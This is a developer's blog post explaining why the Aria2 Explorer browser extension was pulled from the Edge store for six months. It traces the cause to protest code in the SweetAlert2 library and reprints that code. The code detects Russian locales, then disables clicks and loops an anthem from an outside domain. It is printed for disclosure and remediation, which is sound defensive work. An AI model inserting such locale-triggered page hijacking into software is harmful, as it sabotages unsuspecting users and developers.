Announcement

Why Aria2 Explorer Was Banned for Six Months

A library with ten thousand stars, code that could never fire, and somehow we became the "malware" authors

···

Summary: In August 2025, a user notified us via GitHub that Aria2 Explorer had been suddenly removed from the Microsoft Edge Add-ons Store and flagged as “containing malware.” We spent six months communicating with Microsoft and making repeated code changes, all without result. It wasn’t until March 2026, with the help of AI, that a systematic scan of all URLs and domains in our codebase revealed a suspicious domain — flag-gimn.ru — which led us to a piece of protest code deliberately injected into the third-party library SweetAlert2 by its author during the Russia-Ukraine war — code that, inside our extension, could never actually be triggered. This is our full account.

I. What Happened

On August 8, 2025, multiple users filed GitHub Issues informing us that Aria2 Explorer had been removed from the Microsoft Edge Add-ons Store.

Microsoft’s stated reason:

The extension contains or enables malware/PUA.

Aria2 Explorer is an open-source browser extension that exports download tasks to Aria2 for management. Our code is fully public on GitHub, we have over 100,000 active users, and we have been maintaining the project for eight years. We have turned down countless advertising deals and acquisition offers — our only goal has ever been to build a clean, reliable download tool. Being labeled as “containing malware” was equal parts absurd and darkly funny.

We immediately reached out to the Microsoft Edge Extensions team through their official GitHub and via email. Their responses were consistently vague. Only once did they mention that “suspicious domains were found,” without ever specifying which domain, which code, or which file. All other replies repeated only that we had “violated developer policies by containing malware.” With no concrete leads, we had no choice but to start guessing — and guessing wrong, as it turned out.

II. Six Months of Looking in the Wrong Place

The investigation unfolded in two phases.

Phase One (August–September 2025, approximately one month): With no specific guidance from Microsoft, and no way to pinpoint which change had triggered the removal, we naturally focused on the extension’s core functionality — intercepting and forwarding browser download tasks. This involves sensitive permissions like cookies, downloads, and scripting, which seemed the most likely candidates to trigger a security review.

We systematically removed or reworked every module that seemed potentially problematic:

  • aria2:// custom protocol: used to launch a local application to open the download directory — behavior pattern too sensitive, removed
  • Built-in blog: concerned about external links in the content, removed
  • Click-detection content script: intercepting user clicks could be misread as tracking behavior, removed
  • Version check request: periodic fetch to an external URL, removed
  • Permission adjustments: attempted to make cookies an optional permission, trimmed host permissions…

Each submission was rejected with the same unchanged reason. Over the course of five or six attempts, we were operating entirely in the dark, and this phase ended without result.

Phase Two (March 2026): Months later, on a whim, we started discussing the problem with an AI assistant. In the AI’s prompting, we ran a full-text scan of all URLs and domains across our entire build output. Within days, we had found the real root cause.

We had been looking in the wrong place from the very beginning.

III. The Truth: A Piece of Protest Code Hidden in SweetAlert2

The scan surfaced a domain we had never noticed before:

flag-gimn.ru

Searching this domain led us to the open-source JavaScript library SweetAlert2, where we found that its GitHub repository was already full of issues discussing exactly this:

The culprit was the following code:

if (
  typeof window !== 'undefined' &&
  /^ru\b/.test(navigator.language) &&
  location.host.match(/\.(ru|su|xn--p1ai)$/)
) {
  const now = new Date()
  const initiationDate = localStorage.getItem('swal-initiation')
  if (!initiationDate) {
    localStorage.setItem('swal-initiation', `${now}`)
  } else if (
    (now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3
  ) {
    setTimeout(() => {
      document.body.style.pointerEvents = 'none'
      const ukrainianAnthem = document.createElement('audio')
      ukrainianAnthem.src =
        'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3'
      ukrainianAnthem.loop = true
      document.body.appendChild(ukrainianAnthem)
      setTimeout(() => {
        ukrainianAnthem.play().catch(() => {})
      }, 2500)
    }, 500)
  }
}

The logic: detect if the user’s language is Russian and the domain is a Russian TLD (.ru / .su / .xn--p1ai); if so, after three days — disable all click interactions on the page and force-play the Ukrainian national anthem loaded from flag-gimn.ru on a loop.

From any security scanner’s perspective, this code is a textbook example of malicious behavior: page hijacking, loading external resources, connecting to a suspicious domain, and a hidden time-delayed trigger. flag-gimn.ru was exactly the “suspicious domain” Microsoft had been referring to all along.

It is worth noting: this code could never actually be triggered inside our extension. Extensions run in a browser context where location.host reflects the extension’s own origin, which can never match a .ru domain. We were collateral damage — flagged not for anything we did, but simply for carrying the code.

We had not initially focused on the frontend UI code because other Edge extensions that also bundle AriaNG had not been removed. To be clear: this has nothing to do with the AriaNg project itself. The issue arose from our own decision to upgrade certain components during a customization effort.

Once we identified the root cause, we used AI to rewrite all SweetAlert2 usage in the project from scratch — the entire replacement took about 20 minutes. The result looks identical, with a few small visual improvements (we’re rather pleased with it 😏). The code is now fully under our control, with no dependency that can silently change in a future update. In a way, that felt like a fitting epilogue to this whole ordeal.

IV. Background: This Was Not a Bug. It Was a Choice.

SweetAlert2 is one of the most widely used open-source JavaScript dialog libraries, with npm weekly downloads approaching one million. That is precisely why we never audited it — no one audits a mature, well-starred library they have been using for years.

This code was not injected by a third party. It was added by SweetAlert2’s own author, limonte, in response to the Russia-Ukraine war.

  • March 2022: The author added this code to SweetAlert2. It started as an anti-war popup, then escalated to disabling page interaction and force-playing the Ukrainian national anthem. Commit: 7de8f7af
  • November 2022: Community developers discovered it and filed GitHub Issue #2552, describing the behavior as “something that could almost be considered malware.” The author chose to keep it.
  • July 2023: Popular password manager Bitwarden was found to indirectly include this code; pages would lock up completely in Russian-language environments. GitHub Issue #5734
  • September 2024: We introduced SweetAlert2 while customizing and upgrading our AriaNG integration, unknowingly pulling in code that had been sitting there for over two years.
  • August 2025: The issue came to a head, likely because a security scanner updated its signature database. The Chrome Web Store and Microsoft Edge Add-ons Store flagged affected extensions at nearly the same time. Aria2 Explorer was removed from the Edge store.
  • August 14, 2025: The author removed the code in v11.22.4 via PR #2847. The direct trigger was a developer filing GitHub Issue #2846 reporting a Chrome Web Store rejection.

This Was, in Fact, a Collective Movement of 2022

In March 2022—weeks after the Russian military invasion of Ukraine began—the npm ecosystem witnessed a massive outbreak of “protestware.” A host of popular libraries—including node-ipc, es5-ext, styled-components, and event-source-polyfill—were successively injected with protest-related code.

The severity of the resulting harm varied drastically: node-ipc, for instance, directly executed file-deletion operations on the machines of developers suspected to be located in Russia or Belarus, effectively functioning as malware; libraries such as es5-ext and styled-components, conversely, merely displayed text messages and were relatively benign.

The issue with SweetAlert2 lies in the fact that it took a third path—hijacking the webpage at runtime to load external resources. While the potential harm falls somewhere between the two aforementioned extremes, this specific form of behavior happens to be precisely the type most likely to trigger security alerts during application store scans.

V. Two Stores, Two Approaches

Same code, same scanner, two very different responses.

The Google Chrome Team chose to give us a pass. Possibly because the code could never actually fire within our extension, they kept it live rather than pull it — which, honestly, may have saved us from an even bigger mess, or at the very least might have forced us to find the problem sooner 😅.

The Microsoft Edge Team, over six months of communication across multiple channels, only once provided the vague information that “suspicious domains were found,” and otherwise declined to offer any actionable specifics. For an independent developer without access to commercial code-scanning tools, that is functionally useless. Perhaps the details were too sensitive to share — we genuinely don’t know.

The contrast with the Chrome team is telling. As visible in GitHub Issue #2846, the Chrome team gave developers the specific keyword “Ukraine anthem” to aid their investigation — a small detail that makes an enormous practical difference.

We have no interest in judging either company. But the difference in approach produced very different outcomes: one developer community continued to be served without interruption, or was at least able to locate the problem faster; the other spent six months searching in the dark.

VI. A Closing Thought

We understand the anger that comes with war. We understand the impulse to use whatever platform you have to make a statement.

But there are many ways to express a political position. This should not be one of them.

Open-source code is a shared intellectual commons, built on trust between developers across the world. Injecting a hidden political payload into a library that millions of projects depend on does not hurt any government or institution. The ones left holding the bill are developers like us, who had no idea it was there, and the users who rely on what we build.

This code existed for three years. How many developers were affected during that time? No one has a complete count. And for those without access to professional scanning tools, some may still not know.

The world is becoming more unstable, not less. That is precisely why we need more reason and restraint in how we handle conflict — not more chaos injected into infrastructure that everyone depends on.

VII. If This Has Happened to You

If your extension has been removed or rejected from Edge addon store for “suspicious domain” or “malware/PUA” and you cannot figure out why, search your build output for:

"flag-gimn.ru"
"Ukraina.mp3"

If you use SweetAlert2, verify that your version is v11.22.4 or later. The affected range is v11.4.9 through v11.22.3. Versions v11.4.9 through v11.6.13 contained the code with no documentation whatsoever. Versions v11.0.0 through v11.4.8 are not affected.

Also note: this code spread into 28 or more other npm packages. Even if you do not use SweetAlert2 directly, it is worth auditing your dependency tree.

Additionally, GitHub itself features security scanning capabilities; we recommend that all developers enable Dependabot alerts to ensure supply chain security.

VIII. The Final Hurdles

This article was actually completed in late March, pending only the moment Aria2 Explorer was relisted on the Edge Add-ons store. Regrettably, Microsoft put us through the wringer for yet another month. We assumed that simply removing the malicious code would be enough to get the extension relisted; however, it was rejected once again. We then attempted various modifications, but even after three resubmissions, it continued to be rejected. Ultimately, we had no choice but to abandon the original extension ID and submit it as a brand-new listing before it finally passed review and was relisted. Throughout this entire process, Microsoft provided absolutely no notifications or documentation to inform us that once an extension is delisted due to malicious code, it can never be restored to its original listing. Just like that, another month was wasted and both the user count and comments have been reset to zero.🤦‍♂️

Finally

Aria2 Explorer is relist and fully available on the Microsoft Edge Add-ons Store. Thank you to everyone who stayed with us through this.

Postscript

Even while our extension was flagged as “containing malware” and completely unavailable through the Edge store, we still had over 6,000 users somehow keeping it running. We have no idea how they managed it — if you are one of them, we are genuinely curious how you made it work. Leave a comment and let us know. 😀

Edge Weekly Users

Author: Alex Hua Repository: github.com/alexhua/Aria2-Explorer Website: aria2e.com

Licensed under CC BY-NC-SA 4.0
© 2023 - 2026 Alex Hua
Built with Hugo | Theme Stack designed by Jimmy